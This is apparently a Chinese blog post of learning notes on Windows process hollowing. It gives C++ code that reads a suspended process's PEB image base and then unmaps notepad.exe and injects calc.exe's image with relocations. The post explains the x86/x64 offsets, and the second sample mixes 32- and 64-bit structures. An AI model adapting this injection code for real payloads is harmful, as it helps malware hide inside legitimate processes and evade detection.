#include <iostream>

#include <Windows.h>

#include <winternl.h>

#include <tchar.h>

#pragma comment(lib, "ntdll")

int main()

{

    // create destination process - this is the process to be hollowed out

    LPSTARTUPINFOA si = new STARTUPINFOA();

    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();

    PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();

    ULONG returnLenght = 0;

    CreateProcessA(NULL, (LPSTR)"c:\\windows\\system32\\calc.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);

    HANDLE destProcess = pi->hProcess;

    // get destination imageBase offset address from the PEB

    NtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);

    ULONG_PTR  pebImageBaseOffset = (ULONG_PTR)pbi->PebBaseAddress + 8; //如果是在x64,则改成16

    // get destination imageBaseAddress

    LPVOID destImageBase = 0;

    SIZE_T bytesRead = NULL;

    ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, sizeof(ULONG_PTR), &bytesRead); 
    std::cout << "pebImageBaseOffset is: " << destImageBase << std::endl; std::cin.get(); 
}

因为PebBaseAddress在x86下是指向PEB+8,在x64下是指向PEB+16

具体的结构体:

typedef struct _PEB {

    BYTE Reserved1[2]; //2个字节

    BYTE BeingDebugged; //1个字节

    BYTE Reserved2[1]; //1个字节

    PVOID Reserved3[2];

    PPEB_LDR_DATA Ldr;

    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;

    PVOID Reserved4[3];

    PVOID AtlThunkSListPtr;

    PVOID Reserved5;

    ULONG Reserved6;

    PVOID Reserved7;

    ULONG Reserved8;

    ULONG AtlThunkSListPtr32;

    PVOID Reserved9[45];

    BYTE Reserved10[96];

    PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;

    BYTE Reserved11[128];

    PVOID Reserved12[1];

    ULONG SessionId;

} PEB, *PPEB;

如果在x86下,则是以4字节对齐,那么偏移8才能指向Reserved3[1]

在x64下,则是以8字节对齐,那么只有偏移16才能指向Reserved3[1]

可以看这个链接:https://blog.csdn.net/v2x222/article/details/71082150 (ImageBaseAddress : Ptr32 Void  and +0x010 ImageBaseAddress : Ptr64 Void)

第二个sample:

#include <iostream>

#include <Windows.h>

#include <winternl.h>

#pragma comment(lib, "ntdll")

using NtUnmapViewOfSection = NTSTATUS(WINAPI*)(HANDLE, PVOID);

typedef struct BASE_RELOCATION_BLOCK {

    DWORD PageAddress;

    DWORD BlockSize;

} BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK;

typedef struct BASE_RELOCATION_ENTRY {

    USHORT Offset : 12;

    USHORT Type : 4;

} BASE_RELOCATION_ENTRY, * PBASE_RELOCATION_ENTRY;

int main()

{

    // create destination process - this is the process to be hollowed out

    LPSTARTUPINFOA si = new STARTUPINFOA();

    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();

    PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();

    ULONG returnLenght = 0;

    CreateProcessA(NULL, (LPSTR)"c:\\windows\\syswow64\\notepad.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);

    HANDLE destProcess = pi->hProcess;

    // get destination imageBase offset address from the PEB

    NtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);

    ULONG_PTR pebImageBaseOffset = (ULONG_PTR)pbi->PebBaseAddress + 16;

    // get destination imageBaseAddress

    LPVOID destImageBase = 0;

    SIZE_T bytesRead = NULL;

    ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, sizeof(ULONG_PTR), &bytesRead);

    // read source file - this is the file that will be executed inside the hollowed process

    HANDLE sourceFile = CreateFileA("c:\\windows\\system32\\calc.exe", GENERIC_READ, NULL, NULL, OPEN_ALWAYS, NULL, NULL);

    ULONG_PTR sourceFileSize = GetFileSize(sourceFile, NULL);

    SIZE_T fileBytesRead = 0;

    LPVOID sourceFileBytesBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sourceFileSize);

    ReadFile(sourceFile, sourceFileBytesBuffer, sourceFileSize, NULL, NULL);

    // get source image size

    PIMAGE_DOS_HEADER sourceImageDosHeaders = (PIMAGE_DOS_HEADER)sourceFileBytesBuffer;

    PIMAGE_NT_HEADERS sourceImageNTHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew);

    SIZE_T sourceImageSize = sourceImageNTHeaders->OptionalHeader.SizeOfImage;

    // carve out the destination image

    NtUnmapViewOfSection myNtUnmapViewOfSection = (NtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtUnmapViewOfSection"));

    myNtUnmapViewOfSection(destProcess, destImageBase);

    // allocate new memory in destination image for the source image

    LPVOID newDestImageBase = VirtualAllocEx(destProcess, destImageBase, sourceImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    destImageBase = newDestImageBase;

    // get delta between sourceImageBaseAddress and destinationImageBaseAddress

    ULONG_PTR deltaImageBase = (ULONG_PTR)destImageBase - sourceImageNTHeaders->OptionalHeader.ImageBase;

    // set sourceImageBase to destImageBase and copy the source Image headers to the destination image

    sourceImageNTHeaders->OptionalHeader.ImageBase = (ULONG_PTR)destImageBase;

    WriteProcessMemory(destProcess, newDestImageBase, sourceFileBytesBuffer, sourceImageNTHeaders->OptionalHeader.SizeOfHeaders, NULL);

    // get pointer to first source image section

    PIMAGE_SECTION_HEADER sourceImageSection = (PIMAGE_SECTION_HEADER)((ULONG_PTR)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew + sizeof(_IMAGE_NT_HEADERS64)); //IMAGE_NT_HEADERS32

    PIMAGE_SECTION_HEADER sourceImageSectionOld = sourceImageSection;

    // copy source image sections to destination

    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)

    {

        PVOID destinationSectionLocation = (PVOID)((ULONG_PTR)destImageBase + sourceImageSection->VirtualAddress);

        PVOID sourceSectionLocation = (PVOID)((ULONG_PTR)sourceFileBytesBuffer + sourceImageSection->PointerToRawData);

        WriteProcessMemory(destProcess, destinationSectionLocation, sourceSectionLocation, sourceImageSection->SizeOfRawData, NULL);

        sourceImageSection++;

    }

    // get address of the relocation table

    IMAGE_DATA_DIRECTORY relocationTable = sourceImageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];

    // patch the binary with relocations

    sourceImageSection = sourceImageSectionOld;

    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)

    {

        BYTE* relocSectionName = (BYTE*)".reloc";

        if (memcmp(sourceImageSection->Name, relocSectionName, 5) != 0)

        {

            sourceImageSection++;

            continue;

        }

        ULONG_PTR sourceRelocationTableRaw = sourceImageSection->PointerToRawData;

        ULONG_PTR relocationOffset = 0;

        while (relocationOffset < relocationTable.Size) {

            PBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)((ULONG_PTR)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);

            relocationOffset += sizeof(BASE_RELOCATION_BLOCK);

            ULONG_PTR relocationEntryCount = (relocationBlock->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);

            PBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)((ULONG_PTR)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);

            for (ULONG_PTR y = 0; y < relocationEntryCount; y++)

            {

                relocationOffset += sizeof(BASE_RELOCATION_ENTRY);

                if (relocationEntries[y].Type == 0)

                {

                    continue;

                }

                ULONG_PTR patchAddress = relocationBlock->PageAddress + relocationEntries[y].Offset;

                ULONG_PTR patchedBuffer = 0;

                ReadProcessMemory(destProcess, (LPCVOID)((ULONG_PTR)destImageBase + patchAddress), &patchedBuffer, sizeof(ULONG_PTR), &bytesRead);

                patchedBuffer += deltaImageBase;

                WriteProcessMemory(destProcess, (PVOID)((ULONG_PTR)destImageBase + patchAddress), &patchedBuffer, sizeof(ULONG_PTR), &fileBytesRead);

            }

        }

    }

    return 0;

}

win32-ReadProcessMemory在x86和x64下运行的更多相关文章

  1. VS2012在win7 64位机中x86和x64下基本类型的占用空间大小(转)

    VS2012在win7 64位机中x86和x64下基本类型的占用空间大小 #include "stdafx.h" #include <windows.h> int _t ...

  2. x86和x64下指针的大小

    根据测试 int main() { ; )); )); int n1 = sizeof(a); int n2 = sizeof(p); // int n3 = sizeof(*p); error in ...

  3. C语言整数类型在X86和X64下的字节大小

    C声明 32位机器(X86) 64位机器(X64) char 1 1 short int 2 2 int 4 4 long int 4 8 long long int 8 8 char * 4 8 f ...

  4. [百度空间] [原]跨平台编程注意事项(二): windows下 x86到x64的移植

    之前转的: 将程序移植到64位Windows 还有自己乱写的一篇: 跨平台编程注意事项(一) 之前对于x64平台的移植都是纸上谈兵,算是前期准备工作, 但起码在写代码时,已经非常注意了.所以现在移植起 ...

  5. X86和X64环境下的基本类型所占用的字节大小

    同样的程序代码,使用Visual Studio 进行编译,当目标平台分别为x86或x64环境时,其编译结果是不同的.在x86环境下,指针都是4个字节的:而在x64环境下,指针都是8字节的.测试代码如下 ...

  6. Windows下x86和x64平台的Inline Hook介绍

    前言 我在之前研究文明6的联网机制并试图用Hook技术来拦截socket函数的时候,熟悉了简单的Inline Hook方法,但是由于之前的方法存在缺陷,所以进行了深入的研究,总结出了一些有关Windo ...

  7. (转载)用VS2012或VS2013在win7下编写的程序在XP下运行就出现“不是有效的win32应用程序“

    原文地址:http://www.vcerror.com/?p=1483 问题描述: 用VC2013编译了一个程序,在Windows 8.Windows 7(64位.32位)下都能正常运行.但在Win ...

  8. win32和x86以及x64的区别

    本来是知道x86和x64的区别的. 今天突然在VS2008上看到一个win32的选项,一下子懵了,这是什么玩意. 百度之,发现答案 win32是指windows 32位的操作系统,顾名思义是支持32为 ...

  9. 如何让VS2012编写的程序在XP下运行

    Win32主程序需要以下设置 第一步:在工程属性General设置 第二步:在C/C++ Code Generation 设置 第三步:SubSystem 和  Minimum Required Ve ...

  10. Visual Studio中Debug与Release以及x86、x64、Any CPU的区别 &&&& VS中Debug与Release、_WIN32与_WIN64的区别

    本以为这些无关紧要的 Debug与Release以及x86.x64.Any CPU 差点搞死人了. 看了以下博文才后怕,难怪我切换了一下模式,程序就pass了.... 转载: 1.https://ww ...

随机推荐

  1. [转帖]【JVM】G1垃圾收集器的关键技术

    前言 G1 GC,全称Garbage-First Garbage Collector,通过-XX:+UseG1GC参数来启用,作为体验版随着JDK 6u14版本面世,在JDK 7u4版本发行时被正式推 ...

  2. Linux 清理 防火墙已有IP地址的方法

    最简单的处理 for i in `firewall-cmd --zone=trusted --list-sources` ;do firewall-cmd --zone=trusted --remov ...

  3. 基于spring security创建基本项目框架

    SpringBoot建项目步骤 建表 新建项目 (package name可以自定义,整个项目只能在该包下) 选择可能有到的依赖 (别忘了勾选SQL中的Mybatis Framework,创建项目 如 ...

  4. 一文总结现代 C++ 中的初始化

    本文尝试回答: 现代 C++ 有哪几种初始化形式?分别能够用于什么场景?有什么限制? MyClass obj(); 为什么没有调用默认无参构造函数创建一个对象? new int 和 new int() ...

  5. OpenIM (Open-Source Instant Messaging) Mac Deployment Guide

    This guide provides step-by-step instructions for deploying OpenIM on a Mac, including both source c ...

  6. go中的sync.RWMutex源码解读

    读写锁 前言 什么是读写锁 看下实现 读锁 RLock RUnlock 写锁 Lock Unlock 问题要论 写操作是如何阻止写操作的 写操作是如何阻止读操作的 读操作是如何阻止写操作的 为什么写锁 ...

  7. 人工智能的新篇章:深入了解大型语言模型(LLM)的应用与前景

    人工智能的新篇章:深入了解大型语言模型(LLM)的应用与前景 LLM(Large Language Model)技术是一种基于深度学习的自然语言处理技术,旨在训练能够处理和生成自然语言文本的大型模型. ...

  8. 2.13 PE结构:实现PE代码段加密

    代码加密功能的实现原理,首先通过创建一个新的.hack区段,并对该区段进行初始化,接着我们向此区段内写入一段具有动态解密功能的ShellCode汇编指令集,并将程序入口地址修正为ShellCode地址 ...

  9. Python 字符串与字节数组转换

    整数之间的进制转换: 10进制转16进制: hex(16) ==> 0x10 16进制转10进制: int('0x10', 16) ==> 16 类似的还有oct(), bin() 字符串 ...

  10. Libevent [补档-2023-08-29]

    libevent的使用 8-1 安装 ​ 自己百度一下,安装它不是特别难,加油!!! 8-2 libevent介绍 ​ 它是一个开源库,用于处理网络和定时器等等事件.它提供了跨平台的API,能够在不同 ...